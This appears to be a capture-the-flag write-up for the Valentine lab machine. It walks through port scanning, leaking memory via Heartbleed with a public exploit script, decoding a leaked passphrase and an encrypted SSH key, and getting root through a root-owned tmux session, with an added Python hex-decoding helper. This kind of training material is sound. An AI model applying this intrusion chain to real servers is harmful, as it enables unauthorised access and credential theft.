Enum

NMAP

PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 96:4c:51:42:3c:ba:22:49:20:4d:3e:ec:90:cc:fd:0e (DSA)
|   2048 46:bf:1f:cc:92:4f:1d:a0:42:b3:d2:16:a8:58:31:33 (RSA)
|_  256 e6:2b:25:19:cb:7e:54:cb:0a:b9:ac:16:98:c6:7d:a9 (ECDSA)
80/tcp  open  http     Apache httpd 2.2.22 ((Ubuntu))
|_http-server-header: Apache/2.2.22 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
443/tcp open  ssl/http Apache httpd 2.2.22 ((Ubuntu))
|_http-server-header: Apache/2.2.22 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject: commonName=valentine.htb/organizationName=valentine.htb/stateOrProvinceName=FL/countryName=US
| Not valid before: 2018-02-06T00:45:25
|_Not valid after:  2019-02-06T00:45:25
|_ssl-date: 2021-03-28T22:12:11+00:00; -1s from scanner time.
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: -1s

Gobuster reveals:

http://10.10.10.79/dev/

http://10.10.10.79/encode/

http://10.10.10.79/encode/decode.php

Box is vulnerable to Heartbleed. Copy over the script from Searchsploit.

Start leaking stuff from memory:

  00e0: 31 2F 64 65 63 6F 64 65 2E 70 68 70 0D 0A 43 6F  1/decode.php..Co
  00f0: 6E 74 65 6E 74 2D 54 79 70 65 3A 20 61 70 70 6C  ntent-Type: appl
  0100: 69 63 61 74 69 6F 6E 2F 78 2D 77 77 77 2D 66 6F  ication/x-www-fo
  0110: 72 6D 2D 75 72 6C 65 6E 63 6F 64 65 64 0D 0A 43  rm-urlencoded..C
  0120: 6F 6E 74 65 6E 74 2D 4C 65 6E 67 74 68 3A 20 34  ontent-Length: 4
  0130: 32 0D 0A 0D 0A 24 74 65 78 74 3D 61 47 56 68 63  2....$text=aGVhc
  0140: 6E 52 69 62 47 56 6C 5A 47 4A 6C 62 47 6C 6C 64  nRibGVlZGJlbGlld
  0150: 6D 56 30 61 47 56 6F 65 58 42 6C 43 67 3D 3D AC  mV0aGVoeXBlCg==.
  0160: 8C 42 8C D2 C2 50 37 0D 21 54 F1 52 68 F5 7C A5  .B...P7.!T.Rh.|.
  0170: 6C 69 CB 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C  li..............

Base64-decode the $text value => heartbleedbelievethehype.

Remove the spaces from hype_key and convert the hex to ASCII. This reveals a private key.

-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,AEB88C140F69BF2074788DE24AE48D46
-----END RSA PRIVATE KEY-----
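
The hex-to-ASCII step above, as an added Python example (not part of the original notes): it strips whitespace from a hype_key-style hex dump, decodes it, and reads the PEM headers to confirm whether the key is passphrase-protected and with which cipher. The sample input is constructed from the headers shown above with a placeholder body, and the function names are hypothetical.

```python
import re

# Constructed sample: the PEM headers from this page with a placeholder body,
# hex-encoded as space-separated bytes, 16 per line, to mimic hype_key.
_SAMPLE_PEM = (
    "-----BEGIN RSA PRIVATE KEY-----\n"
    "Proc-Type: 4,ENCRYPTED\n"
    "DEK-Info: AES-128-CBC,AEB88C140F69BF2074788DE24AE48D46\n"
    "\n"
    "UExBQ0VIT0xERVI=\n"
    "-----END RSA PRIVATE KEY-----\n"
)
_hex = _SAMPLE_PEM.encode("ascii").hex()
SAMPLE_HYPE_KEY = "\n".join(
    " ".join(_hex[i:i + 2] for i in range(j, min(j + 32, len(_hex)), 2))
    for j in range(0, len(_hex), 32)
)

def hex_to_text(spaced_hex: str) -> str:
    """Drop all whitespace, then decode the hex digits to ASCII text."""
    compact = re.sub(r"\s+", "", spaced_hex)
    if len(compact) % 2 or re.search(r"[^0-9a-fA-F]", compact):
        raise ValueError("input is not a whole number of hex bytes")
    return bytes.fromhex(compact).decode("ascii")

def pem_encryption_info(pem: str) -> dict:
    """Read the headers of a traditional (OpenSSL-style) PEM private key."""
    lines = pem.strip().splitlines()
    m = re.fullmatch(r"-----BEGIN (.+)-----", lines[0].strip())
    if not m:
        raise ValueError("not a PEM block")
    headers = {}
    for line in lines[1:]:
        line = line.strip()
        if not line or ":" not in line:
            break  # blank line, base64 body or END marker ends the headers
        name, value = line.split(":", 1)
        headers[name.strip()] = value.strip()
    info = {"label": m.group(1), "encrypted": False, "cipher": None, "iv": None}
    if headers.get("Proc-Type", "").replace(" ", "") == "4,ENCRYPTED":
        cipher, _, iv = headers.get("DEK-Info", "").partition(",")
        info.update(encrypted=True, cipher=cipher, iv=iv)
    return info

if __name__ == "__main__":
    print(pem_encryption_info(hex_to_text(SAMPLE_HYPE_KEY)))
```

A `Proc-Type: 4,ENCRYPTED` header means the key material is wrapped with a passphrase-derived key, so the file alone is not usable without that passphrase.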

Since the name of the original file was hype_key, I suppose that hype is the user and that heartbleedbelievethehype is the password for the RSA key.

Linpeas reveals there is a tmux session running as root.

Running the observed command gives us a root shell.